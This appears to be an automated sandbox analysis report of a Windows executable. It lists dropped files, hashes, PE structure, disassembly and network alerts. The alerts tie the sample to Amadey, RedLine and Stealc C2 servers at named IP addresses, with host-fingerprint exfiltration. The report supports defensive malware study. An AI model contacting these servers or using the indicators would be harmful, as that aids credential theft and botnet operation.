                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T................0......n........... ........@.. .......................`............@....................................K........j...................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc....j.......l..................@..@.reloc.......@......................@..B........................H.......`..........Y...$+...)...........................................*...(z...(....*.0...........s........~....%:....&~......"...s....%.....(...+o.....8[....o...............%..F~1...(.....%..G~1...(.....%..H~1...(.....%..e~1...(.....~2...(.......o......8......(......s.......se.......~....}....~...........s....(....o....}......{.....I~1...(....o........9......I~1...(.......8C........~1...(....o....:......{....~3...(....8......{....~4...(.........(...........9........o.....
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                                                                        Entropy (8bit):3.4738726491832703
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kK9dm483yJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:pCxkPlE99SCQl2DUevat
                                                                                                                                                                                                                                        MD5:015C0158B153B5E76D0A4C440547840F
                                                                                                                                                                                                                                        SHA1:ACF5223FD19065817113A58A999EFCF866F27018
                                                                                                                                                                                                                                        SHA-256:B2B4F2CD3B769F1DC0665AF53B77233FD30077EB6B4204AC8E49FC20314E0863
                                                                                                                                                                                                                                        SHA-512:2CC6C58B4271F8778A8C7E4AE9F1833318EEDABA0D355501C6E1F8934346667A875FA0D0802E4892C41405514491E5438E4010C8B622328DDC58842CCDED8177
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... .........!.^....(.................................................L#... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\mlk3kK6uLZ.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):292
                                                                                                                                                                                                                                        Entropy (8bit):3.421629507439125
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:KbX45ZsUEZ+lX1YC7UPelkDdtFXqYEp5t/uy0l143ut0:KrDQ1h7keeDNfXV143ut0
                                                                                                                                                                                                                                        MD5:95C6248707C5A56AA34DE57F5381ABBC
                                                                                                                                                                                                                                        SHA1:C62BE5318EE160D8813C23CECB61802D4EF58EBB
                                                                                                                                                                                                                                        SHA-256:E3F08E45998458078A2570099B00914623800E925C0B10CA0818A6A4DCC596ED
                                                                                                                                                                                                                                        SHA-512:FDEF237DD13C261BA5539D4543922F32E21CCB21FE04F680FD09EA2DBFB25897A293E97DFEA34BE0E2DE98120A7BA3F84C9D6DD944E385DCA4C7D8DB5543FB33
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......h%.GLJ.F...c*F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.8.2.5.4.6.2.4.2.4.3.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                        Entropy (8bit):4.421602560596251
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:5Svfpi6ceLP/9skLmb0OTxWSPHaJG8nAgeMZMMhA2fX4WABlEnN70uhiTw:wvloTxW+EZMM6DFyJ03w
                                                                                                                                                                                                                                        MD5:FE65CE1A416905F04323044EDD01BD54
                                                                                                                                                                                                                                        SHA1:40A099ECBCAA9AE0FF51F7F28B9B22451367E4C3
                                                                                                                                                                                                                                        SHA-256:743E07FB01E922269DC0AE0F6B64C4A230E2A33C2E6D477F7DCFE4F7C54F78FA
                                                                                                                                                                                                                                        SHA-512:4E41963B03F19AB5FCBFF280F80D5B3C06D1E66FD8AE9593F67AFC6DCDDBA1205FBF1CFAC7ECFC623D3D3EA873DACBDFD28F2EB708E0E53B86A9C9CBC267E352
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~..\................................................................................................................................................................................................................................................................................................................................................:..h........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):7.949860121922924
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                        File name:mlk3kK6uLZ.exe
                                                                                                                                                                                                                                        File size:1'880'576 bytes
                                                                                                                                                                                                                                        MD5:b85fa0d79d936b8b006c535d006c7f29
                                                                                                                                                                                                                                        SHA1:210085d4f3cf1cf08c34baa5bfba0b0fc5a6c639
                                                                                                                                                                                                                                        SHA256:170004b7b6bab6c3c860a6402f9d3d8988e4f3de7682e28738c3c27ac33b0e1c
                                                                                                                                                                                                                                        SHA512:263b04b455dd7af8455eca46ff9cf833d53a8a3d3c3a4bdf3cfc2edfcf6993c19f2ecc6f2a61ad4c35b57264e3e08f545358c994eb8078aeb1d0403b218da9a9
                                                                                                                                                                                                                                        SSDEEP:49152:K23fbpRhR0OiwF7BESrgRSzLBEF7YcMs6:3zhR9FdVOFSz
                                                                                                                                                                                                                                        TLSH:069533D57FAE2A15F0A146F99B23853375439003AB7BABB35D66CA38CD360C2165DC0B
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                        Entrypoint:0x8aa000
                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x665ECF2A [Tue Jun 4 08:24:10 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        jmp 00007F80807F126Ah
                                                                                                                                                                                                                                        seto byte ptr [eax+eax]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        jmp 00007F80807F3265h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [ebx], cl
                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [ecx], cl
                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add ecx, dword ptr [edx]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        xor byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax+eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [0100000Ah], al
                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                        add byte ptr [ebx], al
                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                        add byte ptr [edx], al
                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                        add byte ptr [ebx], cl
                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0580x6c.idata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a88580x10lkmvftub
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x4a88080x18lkmvftub
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        0x10000x680000x2dc0077a265ab3c5eaf781d142df58d245d9bFalse0.9985004696038251data7.9863934450517355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .rsrc0x690000x1e00x2007ab72a0c5f50e8c294a379922ccd59d0False0.57421875data4.459607789925119IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .idata 0x6a0000x10000x2006e66ae8f9a75bc604a087c954abf8737False0.15234375data1.0684380430289213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        0x6b0000x2a40000x2002ae0ef4a90ccac61ed0c81bfd676f412unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        lkmvftub0x30f0000x19a0000x199a007ad9107fce44bfe5211ab4af797dd899False0.9946698819423253data7.953235940244863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        ajmdtwbz0x4a90000x10000x400d3ac0478ad445fa06382b7ed3a1cd93cFalse0.82421875data6.421745182590485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .taggant0x4aa0000x30000x22007fbefce03ab53f4b73482dfbc662a522False0.06755514705882353DOS executable (COM)0.771265821537485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                        RT_MANIFEST0x4a88680x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        07/13/24-07:07:04.553234TCP2051828ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        07/13/24-07:07:00.456748TCP2044623ET TROJAN Amadey Bot Activity (POST)5897880192.168.2.577.91.77.81
                                                                                                                                                                                                                                        07/13/24-07:06:08.592536TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        07/13/24-07:06:32.660417TCP2044623ET TROJAN Amadey Bot Activity (POST)5897380192.168.2.577.91.77.81
                                                                                                                                                                                                                                        07/13/24-07:07:04.736461TCP2051831ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        07/13/24-07:07:03.747294TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        07/13/24-07:07:03.629036TCP2044696ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M25898080192.168.2.577.91.77.81
                                                                                                                                                                                                                                        07/13/24-07:07:07.333581TCP2044696ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M25898380192.168.2.577.91.77.81
                                                                                                                                                                                                                                        07/13/24-07:06:19.054947TCP2043231ET TROJAN Redline Stealer TCP CnC Activity497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        07/13/24-07:06:13.939319TCP2046056ET TROJAN Redline Stealer/MetaStealer Family Activity (Response)897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        07/13/24-07:06:08.398513TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        07/13/24-07:07:04.374384TCP2044244ET TROJAN Win32/Stealc Requesting browsers Config from C25898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        07/13/24-07:07:04.555587TCP2044246ET TROJAN Win32/Stealc Requesting plugins Config from C25898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        07/13/24-07:06:01.501384TCP2856147ETPRO TROJAN Amadey CnC Activity M34970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        07/13/24-07:06:02.494732TCP2856122ETPRO TROJAN Amadey CnC Response M1804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        07/13/24-07:06:04.782188TCP2044696ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M24970580192.168.2.577.91.77.81
                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:01.493876934 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:01.500016928 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:01.500231028 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:01.501384020 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:01.506714106 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.228634119 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.229063034 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.243724108 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.249550104 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.494731903 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.494786978 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.494951963 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.494951963 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.496480942 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.502295017 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718650103 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718712091 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718748093 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718780994 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718816042 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718849897 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718861103 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718877077 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718878031 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718878031 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718887091 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718920946 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718959093 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.719094992 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.719094992 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.719094992 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.719094992 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.719094992 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.719594002 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.719645977 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.719671965 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.719688892 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.719722033 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.719769955 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.807219982 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.807424068 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.846462965 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.846508026 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.846544981 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.846580029 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.846612930 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.846647024 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.846683025 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.846744061 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.846745014 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.846745014 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.846745014 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.846745014 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.847188950 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.847301006 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.847337008 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.847371101 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.847414970 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.847414970 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.847414970 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848088026 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848140955 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848176956 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848208904 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848246098 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848248005 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848248005 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848248005 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848248005 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848297119 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848306894 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848825932 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848860025 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848911047 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848911047 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.848913908 CEST804970477.91.77.81192.168.2.5
